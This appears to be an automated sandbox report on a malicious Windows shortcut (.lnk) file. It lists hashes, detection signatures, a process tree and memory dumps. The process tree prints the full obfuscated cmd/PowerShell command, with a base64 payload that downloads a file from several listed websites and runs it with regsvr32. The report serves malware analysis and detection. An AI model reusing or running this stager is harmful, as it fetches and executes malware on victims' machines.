Analysis

  • max time kernel
    118s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    13-11-2024 09:40

General

  • Target

    997e6a4caf197fb6695e693d61601a9863f27d35cfb4b9953897bcac2a8fefc5.lnk

  • Size

    3KB

  • MD5

    14dc4ae011bd6703e8d3a0b094d58067

  • SHA1

    e37b85e8f6223da2bef6fa9d890f65ac483bf92b

  • SHA256

    997e6a4caf197fb6695e693d61601a9863f27d35cfb4b9953897bcac2a8fefc5

  • SHA512

    5468f1a77af30e3413ff096769a75edd1550ffe443afac003d609bd789bbacde0084795a6f94047af2ddf475b39fab53a461a2a27add9070797abef88e7ae2cd

Score
6/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\997e6a4caf197fb6695e693d61601a9863f27d35cfb4b9953897bcac2a8fefc5.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2748
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /v:on /c XxlJPJBQkT46VdMdQigOB930G4w8r3fGWLHDECTcu2Gvw/5R92JhPqlNre7LjMzY55k/aHQl||p^o^w^e^r^s^h^e^l^l.e^x^e -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}"
      2⤵
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      • Suspicious use of WriteProcessMemory
      PID:2596
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2548

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2548-40-0x000007FEF587E000-0x000007FEF587F000-memory.dmp

    Filesize

    4KB

  • memory/2548-41-0x000000001B620000-0x000000001B902000-memory.dmp

    Filesize

    2.9MB

  • memory/2548-42-0x000007FEF55C0000-0x000007FEF5F5D000-memory.dmp

    Filesize

    9.6MB

  • memory/2548-44-0x000007FEF55C0000-0x000007FEF5F5D000-memory.dmp

    Filesize

    9.6MB

  • memory/2548-45-0x000007FEF55C0000-0x000007FEF5F5D000-memory.dmp

    Filesize

    9.6MB

  • memory/2548-46-0x000007FEF55C0000-0x000007FEF5F5D000-memory.dmp

    Filesize

    9.6MB

  • memory/2548-43-0x0000000002720000-0x0000000002728000-memory.dmp

    Filesize

    32KB

  • memory/2548-47-0x000007FEF55C0000-0x000007FEF5F5D000-memory.dmp

    Filesize

    9.6MB

  • memory/2548-48-0x000007FEF55C0000-0x000007FEF5F5D000-memory.dmp

    Filesize

    9.6MB